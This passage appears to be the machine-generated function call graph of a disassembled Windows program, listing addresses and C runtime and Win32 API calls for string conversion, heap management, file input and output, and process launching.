__crtCompareStringA_stat 7869 408a92 MultiByteToWideChar 7863->7869 7863->7876 7864->7848 7865 408b16 GetStringTypeA 7870 408b31 7865->7870 7865->7876 7866->7863 7867 406ac2 _malloc 67 API calls 7866->7867 7867->7863 7872 408aa8 GetStringTypeW 7869->7872 7873 408ab9 7869->7873 7874 403abd __mtdeletelocks 67 API calls 7870->7874 7872->7873 7877 408588 7873->7877 7874->7876 7876->7861 7878 408594 7877->7878 7879 4085a5 7877->7879 7878->7879 7880 403abd __mtdeletelocks 67 API calls 7878->7880 7879->7876 7880->7879 7882 40a858 7881->7882 7883 40a85d 7881->7883 7885 401ee2 __invoke_watson 5 API calls 7882->7885 7912 40abc6 7883->7912 7886 408ae9 7885->7886 7886->7865 7886->7876 7887 40a873 7886->7887 7888 40a8b3 GetCPInfo 7887->7888 7892 40a93d 7887->7892 7889 40a928 MultiByteToWideChar 7888->7889 7890 40a8ca 7888->7890 7889->7892 7896 40a8e3 _strlen 7889->7896 7890->7889 7893 40a8d0 GetCPInfo 7890->7893 7891 401ee2 __invoke_watson 5 API calls 7894 408b0a 7891->7894 7892->7891 7893->7889 7895 40a8dd 7893->7895 7894->7865 7894->7876 7895->7889 7895->7896 7897 40a915 _memset __crtCompareStringA_stat 7896->7897 7898 406ac2 _malloc 67 API calls 7896->7898 7897->7892 7899 40a972 MultiByteToWideChar 7897->7899 7898->7897 7900 40a98a 7899->7900 7904 40a9a9 7899->7904 7902 40a991 WideCharToMultiByte 7900->7902 7903 40a9ae 7900->7903 7901 408588 __freea 67 API calls 7901->7892 7902->7904 7905 40a9b9 WideCharToMultiByte 7903->7905 7906 40a9cd 7903->7906 7904->7901 7905->7904 7905->7906 7907 4039d1 __calloc_crt 67 API calls 7906->7907 7908 40a9d5 7907->7908 7908->7904 7909 40a9de WideCharToMultiByte 7908->7909 7909->7904 7910 40a9f0 7909->7910 7911 403abd __mtdeletelocks 67 API calls 7910->7911 7911->7904 7915 409ce6 7912->7915 7916 409cff 7915->7916 7917 409ab7 strtoxl 91 API calls 7916->7917 7918 409d0c 7917->7918 7918->7882 7920 4085c9 LCMapStringW 7919->7920 7924 4085e4 7919->7924 7921 4085ec GetLastError 7920->7921 7920->7924 7921->7924 7922 4087e2 7926 40a82a ___ansicp 91 API calls 7922->7926 7923 40863e 7925 408657 MultiByteToWideChar 7923->7925 7946 4087d9 7923->7946 7924->7922 7924->7923 7934 408684 7925->7934 7925->7946 7928 40880a 7926->7928 7927 401ee2 __invoke_watson 5 API calls 7929 4045f3 7927->7929 7930 408823 7928->7930 7931 4088fe LCMapStringA 7928->7931 7928->7946 7929->7842 7932 40a873 ___convertcp 74 API calls 7930->7932 7965 40885a 7931->7965 7937 408835 7932->7937 7933 4086d5 MultiByteToWideChar 7938 4086ee LCMapStringW 7933->7938 7959 4087d0 7933->7959 7936 406ac2 _malloc 67 API calls 7934->7936 7943 40869d __crtCompareStringA_stat 7934->7943 7935 408925 7945 403abd __mtdeletelocks 67 API calls 7935->7945 7935->7946 7936->7943 7940 40883f LCMapStringA 7937->7940 7937->7946 7942 40870f 7938->7942 7938->7959 7939 403abd __mtdeletelocks 67 API calls 7939->7935 7950 408861 7940->7950 7940->7965 7941 408588 __freea 67 API calls 7941->7946 7944 408718 7942->7944 7948 408741 7942->7948 7943->7933 7943->7946 7947 40872a LCMapStringW 7944->7947 7944->7959 7945->7946 7946->7927 7947->7959 7952 406ac2 _malloc 67 API calls 7948->7952 7962 40875c __crtCompareStringA_stat 7948->7962 7949 408872 _memset __crtCompareStringA_stat 7956 4088b0 LCMapStringA 7949->7956 7949->7965 7950->7949 7953 406ac2 _malloc 67 API calls 7950->7953 7951 408790 LCMapStringW 7954 4087ca 7951->7954 7957 4087a8 WideCharToMultiByte 7951->7957 7952->7962 7953->7949 7955 408588 __freea 67 API calls 7954->7955 7955->7959 7960 4088d0 7956->7960 7961 4088cc 7956->7961 7957->7954 7959->7941 7963 40a873 ___convertcp 74 API calls 7960->7963 7964 408588 __freea 67 API calls 7961->7964 7962->7951 7962->7959 7963->7961 7964->7965 7965->7935 7965->7939 7966->7832 7968 4059d4 7967->7968 7969 404ea7 __encode_pointer 6 API calls 7968->7969 7970 4059ec 7968->7970 7969->7968 7970->7125 7974 40592f 7971->7974 7973 405978 7973->7127 7975 40593b __calloc_impl 7974->7975 7982 4021d0 7975->7982 7981 40595c __calloc_impl 7981->7973 7983 403ef9 __lock 67 API calls 7982->7983 7984 4021d7 7983->7984 7985 405844 7984->7985 7986 404f22 __decode_pointer 6 API calls 7985->7986 7987 405858 7986->7987 7988 404f22 __decode_pointer 6 API calls 7987->7988 7989 405868 7988->7989 7990 4058eb 7989->7990 8005 4097bb 7989->8005 8002 405965 7990->8002 7992 404ea7 __encode_pointer 6 API calls 7993 4058e0 7992->7993 7995 404ea7 __encode_pointer 6 API calls 7993->7995 7994 405886 7997 4058aa 7994->7997 8001 4058d2 7994->8001 8018 403a1d 7994->8018 7995->7990 7997->7990 7998 403a1d __realloc_crt 73 API calls 7997->7998 7999 4058c0 7997->7999 7998->7999 7999->7990 8000 404ea7 __encode_pointer 6 API calls 7999->8000 8000->8001 8001->7992 8067 4021d9 8002->8067 8006 4097c7 __calloc_impl 8005->8006 8007 4097f4 8006->8007 8008 4097d7 8006->8008 8010 409835 HeapSize 8007->8010 8012 403ef9 __lock 67 API calls 8007->8012 8009 403750 _strcpy_s 67 API calls 8008->8009 8011 4097dc 8009->8011 8014 4097ec __calloc_impl 8010->8014 8013 4036e8 _strcpy_s 6 API calls 8011->8013 8015 409804 ___sbh_find_block 8012->8015 8013->8014 8014->7994 8023 409855 8015->8023 8021 403a26 8018->8021 8020 403a65 8020->7997 8021->8020 8022 403a46 Sleep 8021->8022 8027 406b8c 8021->8027 8022->8021 8026 403e1f LeaveCriticalSection 8023->8026 8025 409830 8025->8010 8025->8014 8026->8025 8028 406b98 __calloc_impl 8027->8028 8029 406bad 8028->8029 8030 406b9f 8028->8030 8032 406bc0 8029->8032 8033 406bb4 8029->8033 8031 406ac2 _malloc 67 API calls 8030->8031 8049 406ba7 __dosmaperr __calloc_impl 8031->8049 8039 406d32 8032->8039 8061 406bcd __cenvarg ___sbh_resize_block ___sbh_find_block 8032->8061 8034 403abd __mtdeletelocks 67 API calls 8033->8034 8034->8049 8035 406d65 8037 405f96 __calloc_impl 6 API calls 8035->8037 8036 406d37 HeapReAlloc 8036->8039 8036->8049 8040 406d6b 8037->8040 8038 403ef9 __lock 67 API calls 8038->8061 8039->8035 8039->8036 8041 406d89 8039->8041 8043 405f96 __calloc_impl 6 API calls 8039->8043 8045 406d7f 8039->8045 8042 403750 _strcpy_s 67 API calls 8040->8042 8044 403750 _strcpy_s 67 API calls 8041->8044 8041->8049 8042->8049 8043->8039 8046 406d92 GetLastError 8044->8046 8048 403750 _strcpy_s 67 API calls 8045->8048 8046->8049 8051 406d00 8048->8051 8049->8021 8050 406c58 HeapAlloc 8050->8061 8051->8049 8052 406d05 GetLastError 8051->8052 8052->8049 8053 406cad HeapReAlloc 8053->8061 8054 407601 ___sbh_alloc_block 5 API calls 8054->8061 8055 406d18 8055->8049 8057 403750 _strcpy_s 67 API calls 8055->8057 8056 405f96 __calloc_impl 6 API calls 8056->8061 8059 406d25 8057->8059 8058 406cfb 8060 403750 _strcpy_s 67 API calls 8058->8060 8059->8046 8059->8049 8060->8051 8061->8035 8061->8038 8061->8049 8061->8050 8061->8053 8061->8054 8061->8055 8061->8056 8061->8058 8062 406e52 VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 8061->8062 8063 406cd0 8061->8063 8062->8061 8066 403e1f LeaveCriticalSection 8063->8066 8065 406cd7 8065->8061 8066->8065 8070 403e1f LeaveCriticalSection 8067->8070 8069 4021e0 8069->7981 8070->8069 8072 401518 8071->8072 8113 40ca21 8072->8113 8074 40157f 8075 401589 __flsbuf 8074->8075 8076 4015bd 8074->8076 8126 4017ca 8075->8126 8149 40c205 8076->8149 8078 4015d1 8179 40a121 8078->8179 8081 4015a1 8082 401ee2 __invoke_watson 5 API calls 8081->8082 8083 4015b6 8082->8083 8083->7136 8084 4015de _strncmp 8202 4011f0 8084->8202 8092 401686 __flsbuf 8094 4017ca _fprintf 105 API calls 8092->8094 8093 4016ba 8096 4016ea 8093->8096 8099 401000 67 API calls 8093->8099 8095 401757 8094->8095 8097 401ee2 __invoke_watson 5 API calls 8095->8097 8098 401000 67 API calls 8096->8098 8100 40176f 8097->8100 8101 4016f4 8098->8101 8099->8093 8100->7136 8102 40171f 8101->8102 8103 401000 67 API calls 8101->8103 8104 401731 8102->8104 8105 401776 8102->8105 8103->8101 8238 40bbf4 8104->8238 8247 401410 8105->8247 8110 401790 8111 401ee2 __invoke_watson 5 API calls 8110->8111 8112 4017a3 8111->8112 8112->7136 8114 40ca2d __calloc_impl 8113->8114 8115 40ca42 8114->8115 8116 40ca5f 8114->8116 8117 403750 _strcpy_s 67 API calls 8115->8117 8263 40c302 8116->8263 8120 40ca47 8117->8120 8122 4036e8 _strcpy_s 6 API calls 8120->8122 8125 40ca57 __calloc_impl 8122->8125 8124 403750 _strcpy_s 67 API calls 8124->8125 8125->8074 8127 4017d6 __calloc_impl 8126->8127 8128 4017e9 8127->8128 8130 401815 8127->8130 8129 403750 _strcpy_s 67 API calls 8128->8129 8131 4017ee 8129->8131 8585 4019bd 8130->8585 8133 4036e8 _strcpy_s 6 API calls 8131->8133 8141 4017fe __calloc_impl 8133->8141 8135 401898 8137 4018c4 8135->8137 8597 40261d 8135->8597 8628 4018dc 8137->8628 8141->8081 8146 403750 _strcpy_s 67 API calls 8147 401888 8146->8147 8148 4036e8 _strcpy_s 6 API calls 8147->8148 8148->8135 8150 40c211 __calloc_impl 8149->8150 8151 40c234 8150->8151 8152 40c219 8150->8152 8153 40c242 8151->8153 8159 40c283 8151->8159 8154 403763 __tsopen_nolock 67 API calls 8152->8154 8156 403763 __tsopen_nolock 67 API calls 8153->8156 8155 40c21e 8154->8155 8157 403750 _strcpy_s 67 API calls 8155->8157 8158 40c247 8156->8158 8169 40c226 __calloc_impl 8157->8169 8162 403750 _strcpy_s 67 API calls 8158->8162 8160 40c290 8159->8160 8161 40c2a4 8159->8161 8163 403763 __tsopen_nolock 67 API calls 8160->8163 8164 40a5c9 ___lock_fhandle 68 API calls 8161->8164 8165 40c24e 8162->8165 8166 40c295 8163->8166 8167 40c2aa 8164->8167 8172 4036e8 _strcpy_s 6 API calls 8165->8172 8168 403750 _strcpy_s 67 API calls 8166->8168 8170 40c2b7 8167->8170 8171 40c2cd 8167->8171 8168->8165 8169->8078 8644 40bc43 8170->8644 8174 403750 _strcpy_s 67 API calls 8171->8174 8172->8169 8176 40c2d2 8174->8176 8175 40c2c5 8708 40c2f8 8175->8708 8177 403763 __tsopen_nolock 67 API calls 8176->8177 8177->8175 8180 40a12d __calloc_impl 8179->8180 8181 40a150 8180->8181 8182 40a135 8180->8182 8184 40a15e 8181->8184 8187 40a19f 8181->8187 8183 403763 __tsopen_nolock 67 API calls 8182->8183 8185 40a13a 8183->8185 8186 403763 __tsopen_nolock 67 API calls 8184->8186 8188 403750 _strcpy_s 67 API calls 8185->8188 8189 40a163 8186->8189 8190 40a5c9 ___lock_fhandle 68 API calls 8187->8190 8200 40a142 __calloc_impl 8188->8200 8191 403750 _strcpy_s 67 API calls 8189->8191 8192 40a1a5 8190->8192 8193 40a16a 8191->8193 8194 40a1c0 8192->8194 8195 40a1b2 8192->8195 8196 4036e8 _strcpy_s 6 API calls 8193->8196 8198 403750 _strcpy_s 67 API calls 8194->8198 8197 40a085 __close_nolock 70 API calls 8195->8197 8196->8200 8199 40a1ba 8197->8199 8198->8199 8712 40a1e4 8199->8712 8200->8084 8203 401200 8202->8203 8203->8203 8204 401a9b _calloc 67 API calls 8203->8204 8205 401211 8204->8205 8716 401fc9 8205->8716 8207 40122f 8208 401fc9 91 API calls 8207->8208 8211 401248 _memset 8207->8211 8208->8207 8209 401fc9 91 API calls 8209->8211 8210 401312 8212 4010a0 8210->8212 8211->8209 8211->8210 8213 4010cc 8212->8213 8733 401e96 8213->8733 8216 4011b1 8218 401a9b _calloc 67 API calls 8216->8218 8217 401118 8219 401e96 __wsplitpath 77 API calls 8217->8219 8226 401197 _strncpy 8218->8226 8220 401138 8219->8220 8736 401c84 8220->8736 8221 401ee2 __invoke_watson 5 API calls 8222 4011e0 8221->8222 8222->8092 8227 401a9b 8222->8227 8225 401a9b _calloc 67 API calls 8225->8226 8226->8221 8228 403f2c __calloc_impl 67 API calls 8227->8228 8229 401ab5 8228->8229 8230 403750 _strcpy_s 67 API calls 8229->8230 8233 4016ae 8229->8233 8231 401ac8 8230->8231 8232 403750 _strcpy_s 67 API calls 8231->8232 8231->8233 8232->8233 8234 401000 8233->8234 8235 401008 8234->8235 8235->8235 8236 401a9b _calloc 67 API calls 8235->8236 8237 401023 _memset 8236->8237 8237->8093 8239 40bc03 8238->8239 8241 40bc20 8238->8241 8240 403750 _strcpy_s 67 API calls 8239->8240 8242 40bc08 8240->8242 8241->8239 8245 40bc35 8241->8245 8243 4036e8 _strcpy_s 6 API calls 8242->8243 8244 40bc18 8243->8244 8244->8092 8825 40cb50 8245->8825 8248 401420 8247->8248 8248->8248 8249 401a9b _calloc 67 API calls 8248->8249 8250 40146e 8249->8250 9193 401ff7 8250->9193 8252 4014d2 8255 401350 8252->8255 8253 40147c 8253->8252 8254 401ff7 _sprintf 103 API calls 8253->8254 8254->8253 8256 401ae0 _memset 8255->8256 8257 40137a SetConsoleCtrlHandler CreateProcessA 8256->8257 8258 4013d5 WaitForSingleObject GetExitCodeProcess 8257->8258 8260 4013b9 __flsbuf 8257->8260 8259 401406 8258->8259 8258->8260 8259->8110 8261 4017ca _fprintf 105 API calls 8260->8261 8262 4013cc 8261->8262 8262->8110 8264 40c327 8263->8264 8330 40d052 8264->8330 8267 40c348 8268 4035c0 __invoke_watson 10 API calls 8267->8268 8269 40c352 8268->8269 8274 40c355 8269->8274 8270 40c38b 8354 403763 8270->8354 8273 403750 _strcpy_s 67 API calls 8275 40c39a 8273->8275 8274->8270 8277 40c44b 8274->8277 8276 4036e8 _strcpy_s 6 API calls 8275->8276 8301 40c3a9 8276->8301 8336 40a690 8277->8336 8279 40c4ed 8280 40c4f4 8279->8280 8281 40c50e CreateFileA 8279->8281 8282 403763 __tsopen_nolock 67 API calls 8280->8282 8283 40c5a8 GetFileType 8281->8283 8284 40c53b 8281->8284 8287 40c4f9 8282->8287 8285 40c5b5 GetLastError 8283->8285 8286 40c5f9 8283->8286 8288 40c574 GetLastError 8284->8288 8291 40c54f CreateFileA 8284->8291 8289 403776 __dosmaperr 67 API calls 8285->8289 8362 40a44b 8286->8362 8290 403750 _strcpy_s 67 API calls 8287->8290 8357 403776 8288->8357 8293 40c5de CloseHandle 8289->8293 8294 40c503 8290->8294 8291->8283 8291->8288 8293->8294 8295 40c5ec 8293->8295 8299 403750 _strcpy_s 67 API calls 8294->8299 8297 403750 _strcpy_s 67 API calls 8295->8297 8300 40c5f1 8297->8300 8299->8301 8300->8294 8326 40ca9d 8301->8326 8302 40c91c 8302->8301 8305 40c9a4 CloseHandle CreateFileA 8302->8305 8303 40c671 8371 40cf21 8303->8371 8308 40c8ac 8305->8308 8309 40c9cf GetLastError 8305->8309 8307 40c6e2 8307->8302 8318 40c68d 8307->8318 8427 40810c 8307->8427 8308->8301 8310 403776 __dosmaperr 67 API calls 8309->8310 8313 40c9db 8310->8313 8311 403763 __tsopen_nolock 67 API calls 8311->8318 8312 40bc43 77 API calls __read_nolock 8312->8318 8452 40a4cc 8313->8452 8318->8307 8318->8312 8319 409420 69 API calls __lseeki64_nolock 8318->8319 8320 40c89f 8318->8320 8321 40cf21 69 API calls __lseek_nolock 8318->8321 8323 40c837 8318->8323 8381 40a085 8318->8381 8396 40cd6b 8318->8396 8319->8318 8322 40a085 __close_nolock 70 API calls 8320->8322 8321->8318 8324 40c8a6 8322->8324 8323->8302 8325 403750 _strcpy_s 67 API calls 8324->8325 8325->8308 8327 40caa2 8326->8327 8328 40ca8b 8326->8328 8584 40a669 LeaveCriticalSection 8327->8584 8328->8124 8328->8125 8331 40d061 8330->8331 8332 40c343 8330->8332 8333 403750 _strcpy_s 67 API calls 8331->8333 8332->8267 8332->8274 8334 40d066 8333->8334 8335 4036e8 _strcpy_s 6 API calls 8334->8335 8335->8332 8337 40a69c __calloc_impl 8336->8337 8338 403e36 __mtinitlocknum 67 API calls 8337->8338 8339 40a6ac 8338->8339 8340 403ef9 __lock 67 API calls 8339->8340 8341 40a6b1 __calloc_impl 8339->8341 8351 40a6c0 8340->8351 8341->8279 8342 40a803 8474 40a821 8342->8474 8343 40a799 8345 4039d1 __calloc_crt 67 API calls 8343->8345 8348 40a7a2 8345->8348 8346 40a741 EnterCriticalSection 8349 40a751 LeaveCriticalSection 8346->8349 8346->8351 8347 403ef9 __lock 67 API calls 8347->8351 8348->8342 8464 40a5c9 8348->8464 8349->8351 8351->8342 8351->8343 8351->8346 8351->8347 8353 405f27 __alloc_osfhnd InitializeCriticalSectionAndSpinCount 8351->8353 8461 40a763 8351->8461 8353->8351 8355 4050f5 __getptd_noexit 67 API calls 8354->8355 8356 403768 8355->8356 8356->8273 8358 403763 __tsopen_nolock 67 API calls 8357->8358 8359 403781 __dosmaperr 8358->8359 8360 403750 _strcpy_s 67 API calls 8359->8360 8361 403794 8360->8361 8361->8294 8363 40a4b2 8362->8363 8364 40a459 8362->8364 8365 403750 _strcpy_s 67 API calls 8363->8365 8364->8363 8370 40a47d 8364->8370 8366 40a4b7 8365->8366 8368 403763 __tsopen_nolock 67 API calls 8366->8368 8367 40a4a8 8367->8302 8367->8303 8367->8307 8368->8367 8369 40a4a2 SetStdHandle 8369->8367 8370->8367 8370->8369 8483 40a552 8371->8483 8373 40cf30 8374 40cf46 SetFilePointer 8373->8374 8375 40cf36 8373->8375 8377 40cf65 8374->8377 8378 40cf5d GetLastError 8374->8378 8376 403750 _strcpy_s 67 API calls 8375->8376 8380 40c67e 8376->8380 8379 403776 __dosmaperr 67 API calls 8377->8379 8377->8380 8378->8377 8379->8380 8380->8311 8380->8318 8382 40a552 __close_nolock 67 API calls 8381->8382 8384 40a095 8382->8384 8383 40a0eb 8386 40a4cc __free_osfhnd 68 API calls 8383->8386 8384->8383 8385 40a0c9 8384->8385 8387 40a552 __close_nolock 67 API calls 8384->8387 8385->8383 8388 40a552 __close_nolock 67 API calls 8385->8388 8389 40a0f3 8386->8389 8391 40a0c0 8387->8391 8392 40a0d5 CloseHandle 8388->8392 8390 40a115 8389->8390 8393 403776 __dosmaperr 67 API calls 8389->8393 8390->8318 8394 40a552 __close_nolock 67 API calls 8391->8394 8392->8383 8395 40a0e1 GetLastError 8392->8395 8393->8390 8394->8385 8395->8383 8496 409420 8396->8496 8399 40cded 8400 403750 _strcpy_s 67 API calls 8399->8400 8402 40cdf8 8399->8402 8400->8402 8401 409420 __lseeki64_nolock 69 API calls 8404 40cda6 8401->8404 8402->8318 8403 40ce88 8409 409420 __lseeki64_nolock 69 API calls 8403->8409 8424 40cef1 8403->8424 8404->8399 8404->8403 8405 40cdcc GetProcessHeap HeapAlloc 8404->8405 8407 40cde8 8405->8407 8412 40cdff __setmode_nolock 8405->8412 8406 409420 __lseeki64_nolock 69 API calls 8406->8399 8408 403750 _strcpy_s 67 API calls 8407->8408 8408->8399 8410 40cea1 8409->8410 8410->8399 8411 40a552 __close_nolock 67 API calls 8410->8411 8413 40ceb7 SetEndOfFile 8411->8413 8417 40ce6b 8412->8417 8421 40ce42 __setmode_nolock 8412->8421 8506 4079d9 8412->8506 8415 40ced4 8413->8415 8413->8424 8416 403750 _strcpy_s 67 API calls 8415->8416 8418 40ced9 8416->8418 8419 403763 __tsopen_nolock 67 API calls 8417->8419 8420 403763 __tsopen_nolock 67 API calls 8418->8420 8422 40ce70 8419->8422 8423 40cee4 GetLastError 8420->8423 8425 40ce50 GetProcessHeap HeapFree 8421->8425 8422->8421 8426 403750 _strcpy_s 67 API calls 8422->8426 8423->8424 8424->8399 8424->8406 8425->8424 8426->8421 8428 408118 __calloc_impl 8427->8428 8429 408120 8428->8429 8430 40813b 8428->8430 8431 403763 __tsopen_nolock 67 API calls 8429->8431 8432 408149 8430->8432 8435 40818a 8430->8435 8433 408125 8431->8433 8434 403763 __tsopen_nolock 67 API calls 8432->8434 8436 403750 _strcpy_s 67 API calls 8433->8436 8437 40814e 8434->8437 8438 40a5c9 ___lock_fhandle 68 API calls 8435->8438 8445 40812d __calloc_impl 8436->8445 8439 403750 _strcpy_s 67 API calls 8437->8439 8440 408190 8438->8440 8441 408155 8439->8441 8443 4081b3 8440->8443 8444 40819d 8440->8444 8442 4036e8 _strcpy_s 6 API calls 8441->8442 8442->8445 8447 403750 _strcpy_s 67 API calls 8443->8447 8446 4079d9 __write_nolock 99 API calls 8444->8446 8445->8307 8448 4081ab 8446->8448 8449 4081b8 8447->8449 8580 4081de 8448->8580 8450 403763 __tsopen_nolock 67 API calls 8449->8450 8450->8448 8453 40a538 8452->8453 8454 40a4dd 8452->8454 8455 403750 _strcpy_s 67 API calls 8453->8455 8454->8453 8459 40a508 8454->8459 8456 40a53d 8455->8456 8457 403763 __tsopen_nolock 67 API calls 8456->8457 8458 40a52e 8457->8458 8458->8308 8459->8458 8460 40a528 SetStdHandle 8459->8460 8460->8458 8477 403e1f LeaveCriticalSection 8461->8477 8463 40a76a 8463->8351 8465 40a5d5 __calloc_impl 8464->8465 8466 40a630 8465->8466 8469 403ef9 __lock 67 API calls 8465->8469 8467 40a652 __calloc_impl 8466->8467 8468 40a635 EnterCriticalSection 8466->8468 8467->8342 8468->8467 8470 40a601 8469->8470 8471 40a618 8470->8471 8472 405f27 __alloc_osfhnd InitializeCriticalSectionAndSpinCount 8470->8472 8478 40a660 8471->8478 8472->8471 8482 403e1f LeaveCriticalSection 8474->8482 8476 40a828 8476->8341 8477->8463 8481 403e1f LeaveCriticalSection 8478->8481 8480 40a667 8480->8466 8481->8480 8482->8476 8484 40a55f 8483->8484 8487 40a577 8483->8487 8485 403763 __tsopen_nolock 67 API calls 8484->8485 8486 40a564 8485->8486 8489 403750 _strcpy_s 67 API calls 8486->8489 8488 403763 __tsopen_nolock 67 API calls 8487->8488 8490 40a5bc 8487->8490 8491 40a5a5 8488->8491 8492 40a56c 8489->8492 8490->8373 8493 403750 _strcpy_s 67 API calls 8491->8493 8492->8373 8494 40a5ac 8493->8494 8495 4036e8 _strcpy_s 6 API calls 8494->8495 8495->8490 8497 40a552 __close_nolock 67 API calls 8496->8497 8498 40943e 8497->8498 8499 409446 8498->8499 8500 409457 SetFilePointer 8498->8500 8501 403750 _strcpy_s 67 API calls 8499->8501 8502 40946f GetLastError 8500->8502 8504 40944b 8500->8504 8501->8504 8503 409479 8502->8503 8502->8504 8505 403776 __dosmaperr 67 API calls 8503->8505 8504->8399 8504->8401 8505->8504 8507 4079e8 __write_nolock 8506->8507 8508 407a41 8507->8508 8509 407a1a 8507->8509 8539 407a0f 8507->8539 8512 407aa9 8508->8512 8513 407a83 8508->8513 8511 403763 __tsopen_nolock 67 API calls 8509->8511 8510 401ee2 __invoke_watson 5 API calls 8514 40810a 8510->8514 8515 407a1f 8511->8515 8517 407abd 8512->8517 8521 409420 __lseeki64_nolock 69 API calls 8512->8521 8516 403763 __tsopen_nolock 67 API calls 8513->8516 8514->8412 8518 403750 _strcpy_s 67 API calls 8515->8518 8520 407a88 8516->8520 8565 40659d 8517->8565 8522 407a26 8518->8522 8525 403750 _strcpy_s 67 API calls 8520->8525 8521->8517 8523 4036e8 _strcpy_s 6 API calls 8522->8523 8523->8539 8524 407ac8 8526 407d6e 8524->8526 8531 40516e __getptd 67 API calls 8524->8531 8527 407a91 8525->8527 8529 40803d WriteFile 8526->8529 8530 407d7e 8526->8530 8528 4036e8 _strcpy_s 6 API calls 8527->8528 8528->8539 8534 408070 GetLastError 8529->8534 8535 407d50 8529->8535 8532 407e5c 8530->8532 8555 407d92 8530->8555 8533 407ae3 GetConsoleMode 8531->8533 8554 407f3c 8532->8554 8557 407e6b 8532->8557 8533->8526 8537 407b0e 8533->8537 8534->8535 8536 4080bb 8535->8536 8535->8539 8540 40808e 8535->8540 8536->8539 8541 403750 _strcpy_s 67 API calls 8536->8541 8537->8526 8538 407b20 GetConsoleCP 8537->8538 8538->8535 8563 407b43 8538->8563 8539->8510 8543 408099 8540->8543 8544 4080ad 8540->8544 8546 4080de 8541->8546 8542 407fa2 WideCharToMultiByte 8542->8534 8549 407fd9 WriteFile 8542->8549 8548 403750 _strcpy_s 67 API calls 8543->8548 8551 403776 __dosmaperr 67 API calls 8544->8551 8545 407e00 WriteFile 8545->8534 8545->8555 8547 403763 __tsopen_nolock 67 API calls 8546->8547 8547->8539 8552 40809e 8548->8552 8553 408010 GetLastError 8549->8553 8549->8554 8550 407ee0 WriteFile 8550->8534 8550->8557 8551->8539 8556 403763 __tsopen_nolock 67 API calls 8552->8556 8553->8554 8554->8535 8554->8536 8554->8542 8554->8549 8555->8535 8555->8536 8555->8545 8556->8539 8557->8535 8557->8536 8557->8550 8559 407bef WideCharToMultiByte 8559->8535 8561 407c20 WriteFile 8559->8561 8560 40a3fb 79 API calls __fassign 8560->8563 8561->8534 8561->8563 8562 40a21f 11 API calls __putwch_nolock 8562->8563 8563->8534 8563->8535 8563->8559 8563->8560 8563->8562 8564 407c74 WriteFile 8563->8564 8574 40686c 8563->8574 8564->8534 8564->8563 8566 4065b9 8565->8566 8567 4065aa 8565->8567 8569 4065dd 8566->8569 8570 403750 _strcpy_s 67 API calls 8566->8570 8568 403750 _strcpy_s 67 API calls 8567->8568 8571 4065af 8568->8571 8569->8524 8572 4065cd 8570->8572 8571->8524 8573 4036e8 _strcpy_s 6 API calls 8572->8573 8573->8569 8577 406834 8574->8577 8578 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8577->8578 8579 406847 8578->8579 8579->8563 8583 40a669 LeaveCriticalSection 8580->8583 8582 4081e6 8582->8445 8583->8582 8584->8328 8586 4019f1 EnterCriticalSection 8585->8586 8587 4019cf 8585->8587 8588 40181e 8586->8588 8587->8586 8589 4019d7 8587->8589 8588->8135 8591 40357f 8588->8591 8590 403ef9 __lock 67 API calls 8589->8590 8590->8588 8592 40182e 8591->8592 8593 40358e 8591->8593 8592->8135 8592->8146 8594 403750 _strcpy_s 67 API calls 8593->8594 8595 403593 8594->8595 8596 4036e8 _strcpy_s 6 API calls 8595->8596 8596->8592 8598 40357f __fileno 67 API calls 8597->8598 8599 40262c 8598->8599 8600 40659d __write_nolock 67 API calls 8599->8600 8602 402632 __flsbuf 8600->8602 8601 4018aa 8604 402793 8601->8604 8602->8601 8603 40398c __malloc_crt 67 API calls 8602->8603 8603->8601 8605 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8604->8605 8606 4027fa 8605->8606 8607 4027fe 8606->8607 8610 40357f __fileno 67 API calls 8606->8610 8621 40283f __output_l __aulldvrm _strlen 8606->8621 8608 403750 _strcpy_s 67 API calls 8607->8608 8609 402803 8608->8609 8611 4036e8 _strcpy_s 6 API calls 8609->8611 8610->8621 8612 402815 8611->8612 8613 401ee2 __invoke_watson 5 API calls 8612->8613 8614 4018ba 8613->8614 8624 4026b9 8614->8624 8615 406834 __isleadbyte_l 77 API calls 8615->8621 8616 4026ed 101 API calls _write_string 8616->8621 8617 403abd __mtdeletelocks 67 API calls 8617->8621 8618 404f22 6 API calls __decode_pointer 8618->8621 8619 406817 79 API calls __cftof 8619->8621 8620 40398c __malloc_crt 67 API calls 8620->8621 8621->8607 8621->8612 8621->8615 8621->8616 8621->8617 8621->8618 8621->8619 8621->8620 8622 402746 101 API calls _write_string 8621->8622 8623 402720 101 API calls _write_multi_char 8621->8623 8622->8621 8623->8621 8625 4026d7 8624->8625 8626 4026c4 8624->8626 8625->8137 8626->8625 8631 403bea 8626->8631 8637 401a30 8628->8637 8630 4018e4 8630->8141 8632 403c03 8631->8632 8636 403c25 8631->8636 8633 40357f __fileno 67 API calls 8632->8633 8632->8636 8634 403c1e 8633->8634 8635 40810c __locking 101 API calls 8634->8635 8635->8636 8636->8625 8638 401a60 LeaveCriticalSection 8637->8638 8639 401a41 8637->8639 8638->8630 8639->8638 8640 401a48 8639->8640 8643 403e1f LeaveCriticalSection 8640->8643 8642 401a5d 8642->8630 8643->8642 8645 40bc7a 8644->8645 8646 40bc5f 8644->8646 8648 40bc89 8645->8648 8650 40bcb0 8645->8650 8647 403763 __tsopen_nolock 67 API calls 8646->8647 8649 40bc64 8647->8649 8651 403763 __tsopen_nolock 67 API calls 8648->8651 8653 403750 _strcpy_s 67 API calls 8649->8653 8652 40bccf 8650->8652 8666 40bce3 8650->8666 8654 40bc8e 8651->8654 8655 403763 __tsopen_nolock 67 API calls 8652->8655 8667 40bc6c 8653->8667 8657 403750 _strcpy_s 67 API calls 8654->8657 8659 40bcd4 8655->8659 8656 40bd3b 8658 403763 __tsopen_nolock 67 API calls 8656->8658 8660 40bc95 8657->8660 8661 40bd40 8658->8661 8662 403750 _strcpy_s 67 API calls 8659->8662 8663 4036e8 _strcpy_s 6 API calls 8660->8663 8664 403750 _strcpy_s 67 API calls 8661->8664 8665 40bcdb 8662->8665 8663->8667 8664->8665 8669 4036e8 _strcpy_s 6 API calls 8665->8669 8666->8656 8666->8667 8668 40bd17 8666->8668 8670 40bd5c 8666->8670 8667->8175 8668->8656 8675 40bd22 ReadFile 8668->8675 8669->8667 8672 40398c __malloc_crt 67 API calls 8670->8672 8676 40bd72 8672->8676 8673 40c1c9 GetLastError 8677 40c1d6 8673->8677 8678 40c04f 8673->8678 8674 40be4e 